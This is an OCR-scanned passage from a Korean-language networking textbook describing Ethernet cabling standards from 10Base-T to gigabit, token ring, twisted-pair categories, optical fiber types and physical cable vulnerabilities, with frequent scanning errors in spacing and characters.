모든 10Base-T 결선은 점대 점결선이다. 이것은 10Base-T 케 블이 량끝에 최 고 두대의 
이씨네 트송수신기(즉 다중접 속장치 인 MAU) 들을 가질수 있다는것 을 의 미한다. 한쪽 끝은 
표준적으로 10Base-T 집선기에 련결된다. 다른 끝은 직접 를퓨터국의 망대면기판 (NIC) 이 
나 외부적 인 10Base-T 송수신기에 꽃으면 된다. 오늘날의 NIC 에는 송수신장치 즉 다중접 
속장치가 집적되여 있다. 즉 외부적인 송수신장치가 필요없이 케블을 직접 꽂는다는것을 
의 미한다. 만일 AUI 포구가 있는 이 전카드는 있는데 RJ 나 5 꽂개 가 없다면 할수없 이 눅은 
외 부다중접 속장치 를 써 서 련결 해 야 할것 이 다. 

10Base-T 배선방식 이 별형 망구성 에서만 사용되 여 야 한다는 요구는 없다. 이 방법 은 
두 망기구들을 점대점으로 련결시키는데 많이 쓰인다. 이런 형의 배선을 형성할 때에는 
교차케블을 씨서 수신쌍선과 송신쌍선을 같이 련결하여 자료의 흐름을 보장해야 한다. 
기타 모든 경우에는 직선 혹은 보통케블을 쓴다. 비차페꼬임쌍선 3 부류의 10Base-T 의 최 
고마디길 이는 100m 이 다. 신호의 질적지표가 만족되 는 한 더 긴 마디들도 쓸수 있다. 비 
차폐꼬임쌍선 5 부류와 같은 보다 질 이 높은 케 블은 표준적 으로 요구되 는 신호의 질을 유 
지하는 방향에서 마디길이가 150m 쯤 더 길수 있다. 

10Base-T 를 점대 점케블련결하면 그림 5 —13 에서 보는바와 같이 별모양의 위상구조 
가 생긴다. 별형위상구조에서 별모양의 가운데에는 집선기가 있어 점대점련결이 마치 
도 별 빛 이 가운데 서 밖으로 퍼 져 나가는듯이 보인 다. 별 형위 상구조는 보수가 간단하며 
고장뢰치도 보다 빠르며 케블고장이 나도 어느 한 고리에만 영향을 주게끔 고립시킬수 
있 다. 

10Base-T 선이 송신선과 수신선을 따로 가지고 있는것으로 하여 쌍방향조작기 능을 
선택적으로 지원할수 있게 한다. 쌍방향기능을 지원하기 위해서는 NIC 와 집선기에 쌍방 
향조작기능이 있 어 야 하며 또 그렇 게 설정되 여 있 어 야 한다. 
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10Broad36 방식 10Broad36 은 LAN 환경에서는 널리 쓰이지 않는다. 그러나 MAN 이나 
WAN 환경 에서 는 쓰일수 있으므로 간단히 설명한다. 10Broad36 은 광대역 케 블체계 에서 
10Mbps 의 전송속도를 지원한다. 여기서 《36》은 두 국간의 최대 마디길이가 3,600m 이 
라는것을 의 미하며 이 런 형의 망은 케블 TV(CATV) 전송체 계 에서 쓰이 는것과 곡 같은 눅 
은 동축케블을 쓴다. 

기초대역망기술에서는 하나의 전기적신호를 전송하는데 전체 대역을 다 리용한다. 
이때 이 신호는 아무러한 변조가 없이 송신기 에 의하여 매체 에 전달된다. 이 기술은 기 
초대역망기술의 생산과 유지 에 드는 비 용을 낮추며 10Broad36 을 제외한 이써네트체 계 에 
서 다 쓰인다. 

광대역에서는 충분한 대 역을 리용하여 다중신호를 매체에 내보낸다. 이때의 신호들 
로는 육성，화상，자료정보들이 될수 있다. 전송매체는 여러개의 통로로 나뉘여 지며 매 
통로는 보호통로를 사이 에 두고 서 로 나누어 진 다. 보호통로는 간섭 을 방지 하기 위하여 
통로들사이 에 있는 빈주파수공간이 다. 

광대역케 블은 10Base5 와 10Base2 에 서 리 용하던 기 초대 역 동축케 블보다 더 먼거 리 의 
전송을 할수 있는 우점을 가지고 있다. 한 토막의 10Broad36 은 l，800m 정도까지 갈수 있 
다. 10Broad36 에 서 는 광대역케 블에 물리 적 으로 또는 전기 적 으로 련결시 킬수 있는 송수신 
기를 쓰면 국들을 더 추가할수 있다. 콤퓨터와 송수신기의 련결은 10Base5 의 배선에서와 
같이 AUI 케 블을 통하여 수행한다. 
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10 Broad 36 이 도입되였을 때 이 방식은 10 Base 5 나 10 Base 2 보다 훨씬 더 긴 마디를 지 
원하는 우점 을 가지 고 있 었다. 그러 나 빛섬 유케 블이 도입 되 면서 이 우점 은 점 차 사라지 
게 되였다. 10 Base 2 나 10 Base 5 와 마찬가지로 10 Broad 36 은 더 높은 망속도가 불가능하며 
완전2중운영 방식도 지원하지 못한다. 

반복기들사이의 빚 섬유결선 

반복기들사이의 빛섬유결선 ( FC « RL ) 은 두개의 빛섬유케블상에서 mMbps 의 점대점련 
결 을 보장하기 위하여 개 발되 였 다. 표준규격 에 서 규정한바와 같이 F 이 RL 은 두개 의 반복 
기 사이 의 련결 에만 한정 되 여 있 다. 그러 나 업 체 들에 서 는 그 기 술을 개 조하여 한 를퓨터 
와 한 반복기 사이 의 장거 리련결 도 지 원하게 하였 다. 

1OBaS0-FL 지 금까지 설명한 이씨네 트망에서처 럼 10 Base - FL ( FL 은 fiber link 를 의 미) 
은 10 Mbps 의 전송속도를 지원한다. 두개의 빛섬유케블을 리용하여 2중능력인 송신수신능 
력 을 제공한다. 모든 10 Base - FL 마디 들은 점대점 으로 송수신기 로 련결된다. 이 것은 두개 
의 경 로기 나 망장치 들을 서 로 련결시키 는데 가장 많이 리용될 수 있 다는것 을 의 미한다. 
콤퓨터한대 를 련결 하자면 외 부적 인 lOBase - FL 송수신기 를 리용해 야 한다. 

lOBase — FL 은 건물들사이의 망결선보장에 널리 쓰인다. 보다 긴 마디의 길이를 지원 
할수 있으며 번개나 지면전류 같은 전기적피해에 견딜수 있는 능력을 가지고 있음으로 
하여 망이 입을수 있는 피해를 미리 막는데 리상적이다. 빛섬유는 또한 발전기나 기타 
전기설비 가 내 는 전기 적잡음에는 면역 이 크다. 

lOBase—FB 10 Base-FL 처럼 대체로 콤퓨터를 련결하는데 쓰이는것이 아니라 
10 Base - FB ( FB 는 fiber backbone 을 의 미)는 10 Mbps 의 전송속도로 최 량화된 특수동기 신호 
결선으로 반복기를 서로 련결해 준다. 

10 Base - FL 이 를퓨터와 반복기를 련결하는데 쓰인다면 lOBase — 패는 반복기사이의 
점대점결선에 쓰인다. lOBase - FB 선 량쪽에 있는 반복기가 이 결선을 지원하게 되여 있는 
것 은 다름아닌 자기 의 독특한 신호발생 적특성 과 그 사용수법 이 있기때 문이 다. 따라서 
10 Base-FB 를 10 Base-FL 용반복기 끝에 련결할수 없다. 그것은 10 Base-FL 반복기가 
mBase - FL 신호발생을 지원하지 않기때문이 다. 

1OBaS0-FP 10 Base - FP ( FP 는 加 er passive 를 의미)망은 빛섬유피동별 형 체계상에서 
10 Mbps 의 전송속도를 지원한다. 그러나 완전2중전송은 지원하지 못한다. 10 Base - FP 별형 
은 피동적인 장치로서 직접적인 전원은 필요로 하지 않으므로 직접적인 전원공급이 없는 
곳에서 쓰인다. 이 별모양장치자체는 최고 33개의 워크스테이션을 련결시킬수 있다. 이 
별 형 위상구조는 피동집선기 로서 특수한 10 Base - FP 송수신기 로부터 빛 신호를 받는다(그리 
고 전송자를 포함한 별형위상구조에 련결된 모든 기 타 10 Base - FP 송수신기 에 그 신호를 
피 동적 으로 골고루 분배한다.). 

1 0OBase-T 100 Base - T 라는 식별표시는 그 어떤 망형식을 가지는것이 아니라 여러가 
지 망형태 즉 100 Base - TX ， 100 Base - FX , 100 Base - T 4, 100 Base - T 2 에 대한 통칭이다. 이것 
들을 다 고속이 써 네 트 (Fast Ethernet ) 라고 한다. 

100 Base - T 체 계 들은 흔히 자동인식 이 라고 하는 공정 을 리 용하여 10 혹은 100 Mbps 의 
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전송속도를 지원한다. 이 공정을 쓰면 련결되여 있는 장치로 하여금 얼마만한 속도로 가 
동하겠는가를 결정하게 한다. 10Base-T 망련결은 내장형매체독립대면부 (Mil) 를 가진 NIC 
를 통하여 하든가 혹은 앞에서 언급된 망에서 쓰는 MAU 와 매우 류사한 외 장형 Mil 를 통 
하여 한다. 

100 B 的 e-TX 100Base-TX 는 두쌍의 꼬임쌍선케블상에서 100Mbps 의 전송속도를 지원 
한다. 두쌍중의 한쌍은 자료송신에 쓰이며 다른 한쌍은 자료수신에 쓰인다. 두쌍의 꼬임 
쌍선들욧 하나의 케블에 넣었는데 여기에는 흔히 두쌍의 보충선들이 있다. 만일 두쌍의 
보충 및 예 비쌍선들이 있으면 쓰지 말고 그냥 두어 야 한다. 그것은 그 케블로 다른 신호 
들과 같이 쓸 때 생기는 간섭 (crosstalk) 을 허용하게끔 mBase-TX 가 설계되지 않았기때문 
이 다. 케블의 량쪽끝에는 8위 치 RJ 나5접속구가 하나씩 달려 있다. 

100Base-TX 는 100 Q 짜리 계 5부류비 차폐 꼬임 쌍선 (UTP) 케 블에 서 최 고 100m 전송을 지 
원한다. 제5부류케블은 lOBase-T 에서 쓰이 는 제3부류케블보다 더 높은 급의 배선이다. 
이것은 최고 100MHz 의 주파수에서의 전송이다. 여 러 가지 부류의 꼬임쌍선케블에 대해서 
는 표 5_1에서 언급된다. 

표 5 — 1 꼬임쌍선부류와 정격 


다음의 것 들이 UTP (비 차폐 꼬임쌍선)케 블부류이 다. 

제 1 부류와 제 2 부류 이씨네 트에 사용하기 적 합치 않음. 

제 3 부류 최고 16MHz 까지의 주파수전송을 지원하는 전기적특성과 100D 의 완전저항을 가진 비차 
폐 꼬임쌍선. TIA/EIA 568-A 규격 명세서 에서 규정 됨 . 100Base-T, 100Base-T4, 100Base-T 
에서 사용할수 있음. 

제 4부류 최 고 20MHz 까지 의 주파수에 서 전송지 원하는 전기 적 특성 과 완전저 항 100 D 인 비 차페 꼬 
임쌍선. TIA/EIA 568-A 규격명세서에 규정됨. 10Base-T, 100Base-T4, 100Base-T2 에서 
사용할수 있음. 

제5부류 최고 100MHz 까지의 주파수에서 전송지원하는 전기적특성과 완전저항 100D 인 비차폐 
꼬임쌍선. TIA/EIA 568-A 규격명세서 에서 규정됨 . 10Base-T, 100Base-T4, 100Base-T2, 
100Base-TX 에서 사용할수 있음. 100Base-T 는 지원할수 있으나 케블이 K)0Base-T 규격 
명세 를 만족시 키 는가를 확인하기 위하여 검 사해 야 함. 

제 5e 부류 제 5e 부류(혹은 Enhanced Cat5 즉 성능갱신판 5부류)는 새 규격으로서 제5부류를 증가하 
는 전송능력이 다. 제5부류와 마찬가지 로 이 부류는 완전저 항 100D 에 100MHz 까지의 
부파수에서의 전송을 지원하는 전기적 특성을 가진 비 차폐꼬임쌍선이다. 그러나 
NEXT (근단말새 기 )， PSELFEXT (전 력합등준위원 단말새 기 )와 감쇠 현 상을 갱 신 한 규격 명 
세서 를 가지 고 있 다. TIA/EIA 568-A 표준갱 신항목에 서 규정예 견됨 . 1000Base-T 에 서 리 
용할것을 목적 하고 있으나 10Base-T，100Base-T4, 100Base-T2, 100Base—TXi. 지원함. 

제 6 부류 최고 250MHz 까지의 주파수와 100D 의 완전저항을 가전 꼬임쌍선에서의 전송지원을 예 
견한 표준안 

제 7 부류 최고 600MHz 까지의 주파수와 100D 의 완전저항을 가진 꼬임쌍선에서의 전송지원을 예 
견한 표준안 
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모든 100 Base - TX 마디들은 점대점 으로 매끝에 하나의 송수신장치 가 붙어 있다. 대 
부분의 100 Base - TX 결 선은 콤퓨터 국을 집 선기 에 잇 는 방법 으로 한다. 100 Base - TX 집 선 
기는 표준적으로 송수신장치를 내부적으로 가지고 있다. 그러므로 제5부류케블꽃개를 
직 접 집 선기 에 잇 는 RJ 나5접 속구에 꽃으면 된 다. 콤퓨터국의 련결 은 NIC 를 통하여 실 
현된다. 송수신장치의 기능이 NIC 에 집적되여 있으므로 제5부류꼬임쌍선케블을 직접 
NIC 에 있 는 RJ — 45에 꽃을수 있다. 그렇 지 않으면 Mil 를 리용하여 케 블을 콤퓨터 에 
련 결 할수도 있다. 

1 0OBase-FX 100 Base — FX 는 두줄의 빛 섬유케블로 100 Mbps 의 전송속도를 보장하며 
한방향 혹은 쌍방향전송을 둘다 지원한다. 기본적으로는 100 Base — TX 의 빛섬유판이 라고 
볼수 있다. 모든 꼬임쌍선들은 빛섬유들로 교체되고 있다. 

100Base-T4 100 Base - T 4 는 4쌍의 제 3부류 혹은 보다 더 좋은 꼬임케 블망에 서 
100 Mbps 의 전송속도를 보장한다. 100 Base - TX 가 요구하는 계5부류와는 반대로 보다 눅은 
제 3부류케 블을 쓰는 100 Mbps 이 씨네 트를 지 원 한다. 

100 Base - T 4 에 쓰이는 4쌍의 선들중에서 한쌍은 자료전송，다른 쌍은 자료수신에 쓰 
이며 남은 두개의 쌍방향케블은 송신 혹은 수신에 쓰인다. 이러한 배렬로 하여 3쌍의 선 
들이 자료전송에 리 용되 며 한쌍은 전문적 으로 망접 속에 서 의 충돌을 방지하는데 항상 리 
용되게 된다. 

100 Base - T 4 는 100 Mbps 로 자료전송 및 수신을 동시 에 하지 못하므로 완전쌍방향운영 
방식을 지원하지 못한다. 

lOOOBase-X lOOOBase - X 라는 표식 은 기 가비 트망을 이 루는 표준을 의 미하는것 이 다. 
기 가비 트망에는 1000 Base - LX , 1000 Base - SX , 1000 Base - CX , K )00 Base - T 가 있 다. 이 기 술 
들은 다같이 기 가비트이써네 트장치의 매체접근조종 ( MAC ) 및 물리층기능들을 가진 기 가 
비 트매 체 독립대 면부 ( GMII ) 를 리용한다. GMII 는 10 Mbps 이 써네 트의 부착장치대 면부 ( AUI ) 
그리 고 100 Mbps 이 씨네 트의 매 체독립대 면부 ( Mil ) 와 상사적 이 다. 그러 나 AUI 나 Mil 와는 
달리 GMII 에서는 그 어떤 접속구도 쓰지 않고 송수신장치와 외부적 인 케블을 통하여 련 
결된 다. 모든 기 능들은 직 접 기 가비 트이 써네 트장치 에 있 으며 앞에 서 언급한 GMII 는 다만 
내적부분품에 지나지 않는다. 

1000Base-LX 이 케블은 장파레이자를 리용하여 빛섬유케블로 자료를 전송한다. 단 
일방식과 다중방식빛섬유(후에 설명함)가 다 지원된다. 장파레이자는 단파레 이자보다 더 
비싸지만 보다 긴 거리에 도달하는 장점을 가지고 있다. 

1000Base-SX 이 케블은 단파레이자를 리용하여 빛섬유케블로 자료를 전송한다. 다 
중방식빛섬유만 지원된다. 단파레 이자는 장파레 이자보다 눅은 장점을 가지고 있다. 

1 000Base-CX 이 배선 방식은 twinax 혹은 short haul copper 라고도 부르는 특별 한 차 
페균형동잠퍼케 블을 사용한다. 마디길 이는 25 m 로 제 한되 는데 이 렇게 되 면 1000 Base-CX 
가 배선실 갈은 좁은 공간에서 설비를 련결시키는데만 쓰이게 된다. 

1000Base-T 이 배선방식은 제5부류균형동축케블 100m 의 기가비트이써네트를 지원 
한다. 4쌍의 제5부류배선상에서 완전2중전송방식이 가능하다. 총체적인 자료전송속도 
1000 Mbps 를 보장하려면 매 쌍선으로 250 Mbps 의 자료전송속도가 보장되여야 한다. 
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통표고리 


통표고리형 은 이써네트다음으로 가장 많이 쓰이 는 국부망 ( LAN ) 기 술이다. 통표고리형 
국부망의 국들은 고리형의 위상구조를 이루며 여기서 자료들은 고리형국 하나에서 다음 
국으로 순차적 으로 전송되 는 방식 을 취 한다. 통표를 순환시키 는 방식 으로 고리 전체 를 초 
기화한다. 고리상에서 자료전송하기 위해서는 하나의 국이 통표를 잡아야 한다. 정보를 
전송하면 정보를 국에 전달하는 프레 임 이 그 통표를 밀어 낸다. 그 프레임은 고리를 순 
환하면서 하나 혹은 그이상의 목표국들에서 복사된다. 그 프레임이 송신국에 되돌아 오 
면 그것은 고리망에서 제거되며 새로운 다른 통표가 전송된다. 

1980년대 초 IBM 회 사는 스위 스의 중리히 에 있는 자기 의 연구소에 서 이 통표고리형 
망을 처 음으로 규정하였 다. IBM 은 통표고리형 망의 표준화를 추진하였으며 그 이 후 1985 
년에 원래 IBM 개 인콤퓨터 의 갱 신본인 첫 통표고리 망제 품을 도입하였 다. 초기 통표고리 제 
품들은 4 Mbps 로 가동하였다. IBM 회사가 아닌 다른 회사들도 각기 자체의 통표고리망관 
련설 비 를 개 발할수 있는 소편을 제 작할수 있 도록 하기 위하여 IBM 은 Texas Instruments 와 
공동개발에 들어 갔다. 1989년에 IBM 은 통표고리형망의 전송속도를 4배로 높여 통표고 
리형제품도입 에서 처 음으로 16 Mbps 를 보장하였다. 

1997년에 전용통표고리 ( DTR ) 망이 도입되였는데 이것은 전용 즉 완전쌍방향운영체계 
였다. 전용통표고리망은 보통의 통표넘 기기규약을 생 략하여 두 국간의 점대점련결상에서 
통신을 보장할수 있게 한다. 이렇게 되면 매국이 전송과 수신을 동시에 하게 되여 있기 
때문에 전송속도가 배로 높아 지게 된다. 이렇게 되면 총체적으로 자료전송속도 32 Mbps 
를 엄는것으로 된다. 1998년에 새로운 100 Mbps 의 통표고리제품이 하나 개발되여 이 갱신 
속도로 전용운영 이 가능하게 되였다. 

고리 통표고리 망에서 고리 는 전송매 체인 케 블과 그에 련결된 고리국을 포함한다. 많 
은 사람들이 통표고리를 고리망의 위상구조로 생각하는데 그렇지 않다. 통표고리망은 그 
림 5 — 8에 서 보는것 처 럼 별모양으로 배 선된 고리형 위 상구조이 다. 

매 국은 통표고리 적 응기 기 관을 가지 고 있 어 야 하며 돌출케 블을 리용하여 집 선기 에 결 
선될수 있다. 집선기와 집선기들사이의 결선은 련결부 ( patch ) 혹은 중계선케블을 통하여 
집 선기 에 있는 고리입 구 혹은 고리 출구포구들에 꽃는 방법 으로 한다. 집선기 자체 는 흔히 
다국간접근장치 ( MSAU ) 라고 한다. 

고리의 매국은 고리의 웃부분의 가장 가까운 국에서 자료를 받아 아래부분의 가장 
가까운 국에 그것을 넘겨 준다. 즉 그것은 통표고리망에서 자료가 순차적으로 매국으로 
중계 된 다는것 을 의 미한다. 자료를 받을 국은 자료가 지 나갈 때 그 자료를 인 차 복사해 
놓는다. 전송자료가 원래의 송신자국에 다시 돌아 오면 고리에서 제거된다. 국은 통표가 
지 나갈 때 를 포착하면 망상의 자료전송권 (프레 임 이 라고도 함)을 획 득한다. 통표자체 도 고 
유한 신호렬 을 가진 프레 임 으로서 프레 임전송후에 매 번 망에 서 순환된 다. 

정 확한 동표를 포착하자마자 매 국은 자체 로 동표에 포함된 자료를 수정 한다. 동표자 
료에는 다음과 갈은것들이 포함된다. 


• 조종마당 및 상태마당 
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• 주소마당 

• 경로조정정보마당 

• 정보마당 

• 검사합 

자료전송을 끝낸후 국은 새로운 통표를 전송하여 다른 국들이 고리접근권을 가지고 
자기 자료들을 전송할수 있게 한다. 

일부 이씨네트형망들에서처럼 통표고리망들은 삽입 및 우회방식이 있어 국들이 망에 
들어 갈수도 있고 떠날수도 있게 한다. 국이 우회방식에 놓이면 돌출케블이 《감싸여》 
국에 들어 가 있게 되므로 국자체 가 하나마디망상에서 자체검사와 진단검사를 할수 있게 
된다. 이 방식에서는 련결되여 있는 고리에서 참가권을 잃게 된다. 집선기가《유령드라 
이브》신호를 받아야 국이 고리에 삽입된다. 

통표고리 는 4Mbps 혹은 16Mbps 의 속도로 운영되며 고전통표고리 라고 알려 져 있다. 
전용통표고리라는 고속운영체계도 있다. 오늘날의 통표고리적응기知 dapter) 는 망에 꽃을 
때 현재의 망속도를 람지 하고 그 속도에 맞추는 기능의 회 로를 포함한다. 

케블의 종류 


이 부분에서는 보다 널리 쓰이는 케블형태들과 그 사용법의 일부를 보기로 한다(표 
5-2). 

꼬임쌍선 

꼬임쌍선케블이 이렇게 명명된것은 선쌍이 서로 감겨 꼬였기때문이다. 매 선쌍은 서 
로 꼬인 두개의 절연된 통선으로 이루어 져 있다. 선쌍을 함께 꼬아 놓음으로써 회로에 
서 의 간섭 을 줄이고 장애 를 감소시 킬수 있게 한다. 

비차페꼬임쌍선케 ■( UTP ) 비차폐 꼬임 쌍선케 블은 오늘날 많이 리 용되 고 있 다. UTP 라 
고도 알려 진 이 케 블은 차폐 가 없고 모든 꼬임 쌍선형태 는《 부류》준위 에 기 초하여 등 
급이 매겨 져 있다. 이 부류준위는 케블이 받아 들일수 있는 한계가 얼마이며 그것을 리 
용하여 실 현하는것 이 무엇 인가를 결정한다. 

UTP 는 여 러쌍의 100 Q 케블이지만 일반적으로는 보통피복으로 피복된 4쌍의 선을 포 
함하고 있 다. 10Base-T, 100Base-TX 그리 고 100Base-T2 는 꼬임 쌍선 두개 만을 리 용하며 
한편 100Base-T4 와 1000Base-T 는 모두 4개의 꼬임쌍선을 요구한다. 

칸막이차페꼬임쌍선케블 ( SCTP ) 칸막이차폐 꼬임 쌍선은 네 선쌍모두를 단일 한 금속박막 
이 나 꼬임선으로 차페된 4쌍의 100Q UTP (비차페꼬임쌍선)이 다. 이 박막이 나 선으로 콘 
차페막은 EMI 복사를 최소로 만들며 외부잡음에 대한 감수성을 최소화한다. 이러한 형태 
의 케 블은 박막꼬임 쌍선 혹은 칸막이차페 UTP(CsUTP) 라고도 알려 져 있 다. 기 술적 으로 
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칸막이차페된 꼬임쌍선은 금속박막으로 차페된 비 차페꼬임쌍선과 같다. 이것은 UTP 도선 
등가부류와 갈은 방법 으로 이씨네 트응용에서 사용되 고 있다. 

차페꼬임쌍선케블 ( STP ) 이 형 태의 케블은 기술적 으로 차페 꼬임쌍선형 이며 통표고리 
형망에서 리용되는 배선을 서술하는데 가장 일반적으로 사용되는 용어 이 다. 매 꼬임쌍선 
은 개별적으로 차페된 금속박막이 감겨 져 있고 전면에 걸쳐 콘 끈으로 테를 두른 차페 
선으로 에워 싸여 있 다. 이 준위의 차폐는 EMI 복사와 말새 기 ( cross - telk ) 를 최소화한다. 이 
케 블은 일 반적 으로 이씨네 트와 함께 사용되 지 는 않으며 한편 이 것은 완전저 항정 합변압기 
의 리용과 갈은 용도에 적 응시 킬 수 있 다. 


표 5_2 케블의 형태와 속성 


표준속도 

토막당 

자료마디 

위상 

구조 

매체 

최대케 블토막의 길 이 (m) 

단방향 

쌍방향 

10Base5 

10Mbps 

100 

모선 형 

단일 50 D 동축케 블(굵은 이 써 네 트)(10_굵기 ) 

500 

미확인 

10Base2 

10Mbps 

30 

모선 형 

단일 50QRG58 동축케블(가는 
이 써 네 트 )( 굵기 5mm) 

185 

며 확인 

10Broad36 

10Mbps 

2 

모선 형 

단일 75D CATV 광대역케블 

1,800 

미확인 

FOIRL 

10Mbps 

2 

별 형 

♦개의 빛섬유케블 

1,000 

1,000이상 

lBase5 

1Mbps 


별 형 

두쌍의 꼬임전화케블 

250 

머 확인 

lOBase-T 

10Mbps 

2 

별형 

두쌍의 100 D 3부류 혹은 그 
보다 높은 UTP 케블 

100 

100 

lOBase-FL 

10Mbps 

2 

별 형 

f 개의 빛섬유케블 

2,000 

2,000 

이상 

lOBase-FB 

10Mbps 

2 

별형 

두개의 빛섬유케블 

2,000 

미확인 

lOBase-FP 

10Mbps 

2 

별형 

두개의 빛섬유케블 

1,000 

미확인 

100Base-TX 

100Mbps 

2 

별형 

두쌍의 K)0D 5부류 UTP 케블 

100 

100 

100Base-FX 

100Mbps 

2 

별형 

，개의 빛섬유케블 

412 

2,000 

100Base-T4 

100Mbps 

2 

별형 

네쌍의 100 D 3부류 혹은 그 

이상의 UTP 케블 

100 

미확인 

100Base-T2 

lOOOBase-LX 

lOOOBase-SX 

100Mbps 

lGbps 

lGbps 

2 

2 

2 

별형 

별형 

별형 

두쌍의 100 D 3부류 혹은 그 

이상의 UTP 케블 

장파레 이 자 

단파레 이 자 

100 

100 

lOOOBase-CX 

lGbps 


별형 

특수차페 평 형 동잠퍼 케 블묶음(쌍동 
축케 블 혹은 short haul copper 케 블) 

25 

25 

lOOOBase-T 

lGbps 

2 

별형 

네쌍의 100 D 5부류 혹은 그 

이상의 케블 

100 

100 
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빚섬유 

자료가 전기신호를 리용하여 전송되는 배선체계와는 달리 빛섬유는 빛을 리용한다. 
이 체계는 전기신호를 빛으로 변환하고 그것이 가는 유리섬유를 통하여 전송되고 그것을 
수신하는 국에서 다시 전기신호로 변환한다. 이것은 FOIRL, 10Base-FL, 10Base-FB, 
10Base-FP, 100Base-FX, 1000Base-LX 및 1000Base_SX 통신표준용전송매체로서 리용된다. 

빛섬 유도선은 3개 의 동심 층으로 제 조된다. 제 일 중심층(혹은 속심)은 빛 이 실제 적으 
로 섬유를 통하여 전송되는 부분이 다. 

《피복》층은 두번째 층 즉 중간층을 이룬다. 이 층은 그것을 통하여 빛이 전달되지 
못한다는것을 의미하는 더 작은 굴절지표를 가진다. 이것은 속심 에 국한하며 빛신호가 
유지 되 게 하는데 복무한다. 바깥층은 내부의 두 층에 대 한《 완충》과 보호를 도모하는 
데 복무한다. 

두가지 기 본적 인 형 태의 빛섬 유가 있다. 그것은 다자태빛섬 유와 단일자태빛섬 유이다. 

다자태빛섬유 ( MMF ) 두가지 형태의 MMF 가 있다. 즉 개량형과 계단형이 있다. 개량 
형의 빛섬유는 속심의 바깥쪽으로 나가면서 작은 반사률을 가지며 속심의 중심으로 향 
하면서 점차적으로 증가된다. 이 지표는 빛섬유에서 신호분산을 감소시킨다. 계 단형빛섬 
유는 속심에서 균일한 반사률을 가지며 속심/피복련결부에서 반사곁수의 급격한 감소를 
일으킨다. 계단형다자태빛섬유는 일반적으로 개 량형다자태빛섬유보다 작은 대역너 비를 
가진 다. 

꼬임쌍선케블에 비 한 다자태 빛섬유의 근본장점은 그것 이 보다 긴 토막길이를 가진다 
는것 이 다. 보안의 견지 에 서 꼬임 쌍선케 블우에 서 보다 빛섬 유쌍에 서 반송되 는 정 보에 접 근 
하기가 훨씬 더 어렵다. 

단일자태빛섬유 ( SMF ) 단일자태빛섬유 (SMF) 는 단일한 빛의 자태만을 지원하는 작은 
속심직경을 가진다. 이것은 대역너비를 제한하는데서 주요인자인 분산을 제거한다. 그렇 
지만 단일자태빛섬유의 속심직경이 작은것이 빛을 빛섬유에 결합시키는것을 더 어렵게 
하며 그래서 비용이 많이 드는 레이자를 광원으로 리용하는것이 필요하다. 레이자광원 
은 LED 들이 넓은 범위의 주파수를 내보내기때문에 SMF 에서 높은 대역너비를 얻는데 
리용되며 그래서 분산은 의미 심장한 문제로 된다. 이것은 SMF 망에서 실현과 유지보수 
를 위하여 비 용이 더 들게 하고 있다. SMF 는 MMF 보다 훨씬 더 긴 토막길 이를 지 원할 
수 있 다. 토막길 이 5,000m 와 그이 상이 자료전송속도 lGbps 까지 에 겹 쳐 모든 이써네 트에 
서 지 원된 다는것 이 다. 그렇 지 만 SMF 는 MMF 보다 전개하는데 비 용이 더 많이 든다는 
약점이 있다. 

통표고리 (token ring ) 언급한바와 같이 통표고리체계는 원래 차페꼬임쌍선도선을 리 
용하여 실현되 였다. 이것은 후에 전통적 인 비 차폐꼬임쌍선도선을 리 용하는데 적 용되 였다. 
통표고리망은 매 워크스테이션을 집선기에 련결하기 위하여 두개의 쌍선을 쓴다. 한 쌍 
선은 자료를 전송하는데 쓰이며 다른 쌍선은 자료를 수신하는데 쓰인다. 차페꼬임쌍선케 
블들은 통표고리망을 련결하기 위하여 두개의 쌍선을 포함하고 있고 전화전송을 위하여 
추가적인 쌍선을 포함할수 있다. 이것은 통표고리망환경으로 하여금 음성과 자료를 반송 
하는데 갈은 배선을 리용할수 있게 한다. 
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UTP 케블은 전형적으로 4개의 쌍선을 포함하고 있는데 통표고리망에서는 두개의 쌍 
선만 리용된다. 통표고리망을 실현하는데서는 일반적으로 매체 이음부로서 한개의 9핀 D - 
외 피접속기를 리용한다. 지 금은 비차폐꼬임쌍선을 적 응시켜 D - 외 피 나 더 널 리 보급된 
RJ 나 5 자료자크를 리용할수 있다. 현대 적 인 통표고리망기 판은 두 이 음부를 다 지 원한다. 
RJ 나5자크를 가지지 못하는 낡은 통표고리망기판은 완전저항정합변압기를 리용하여 비 
차폐꼬임쌍선망에 아직 은 련결 할수 있 다. 이 변압기 는 100 Q 완전저 항의 케볼로부터 그 
카드가 기대하는 150 Q 완전저항으로 변환된다. 

케블취약성 


케블에는 어느 정도 직접적인 취약성이 있다. 그것은 원래 이것이 물리적매체이기때 
문이며 결과적 으로 직 접간섭 이 나 직접 적손상 같은것은 다시 배선할것 을 요구한다. 그렇 
지 만 무선통신의 출현과 함께 망우에서 아무런 지 식도 없이 자료를 엿볼수 있게 되 였다. 

간섭 

간섭 은 어 떤 장치 가 의 도적 이 든 아니 든 케 블을 통하여 전기 적신호의 흐름을 와해시 
키거나 방해하는 위치에 놓일 때 발생한다. 자료는 전기적성질을 리용하여 케블을 따라 
흐르며 자기마당이 나 다른 전기마당에 의하여 변화될수 있다. 이것은 결과적 으로 케 블우 
에서 전체 신호의 손실이나 자료의 변경을 빚어 낸다. 자료의 변경은 일반적으로 자료의 
손실을 가져 온다. 간섭은 기계류，마이크로파장치들 그리고 지어 형광등장치에 의해서도 
발생될수 있다. 

이 와 같은 정 황을 처 리 하기 위하여 엇 바뀌 는 배 선경 로조정 체 계 (전기 도관을 포함하 
여 )를 전개 하며 케 블배 선의 위 치 선정 을 돌보기 위 하여 특수한 설 비 들을 배 치 하는것 이 다. 

추가적 으로 차폐 나 케 블을 보호하기 위하여 금속피 복을 포함시켜 신호의 손실위 험 을 
감소시키 는 배 선방법 이 개 발되 였 다. 빛섬 유케 블은 신호전송에 빛 을 리용하기 때 문에 이 
문제로 피해를 받을 일은 없다. 

케블절단 

이것은 그 어느것보다 더한 망불법행위의 원인인것 같다. 이 경우에 신호는 케 
블이 물리적 으로 절 단된 결과에 차단된다. 설비 를 옮기 거 나 케 블근처 를 파헤칠 때 
절 단되 는 일 이 일 어 날수 있다. 공중교환봉사를 제 공하는 통신회 사들은 케 블을 처 
음으로 설치할 때 망여유회선을 설 치하는 방법 으로 이 런 사고를 처 리한다. 그들은 
전체적 인 통신손실 이 생길 경우를 줄이기 위하여 추가적 으로 고장방지대 책 이 포함 
되 게끔 자기의 망을 설계한다. 일 반적 으로 LAN 관리 자는 이 런 근심 을 하지 않는다. 
그의 관심은 비루스로부터 그리고 부정확하게 취급되여 정보를 잃게 되는 결과가 
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일어 나는것으로부터 탁상형콤퓨터를 보호하는데 초점을 둔다. LAN 관리자는 또한 
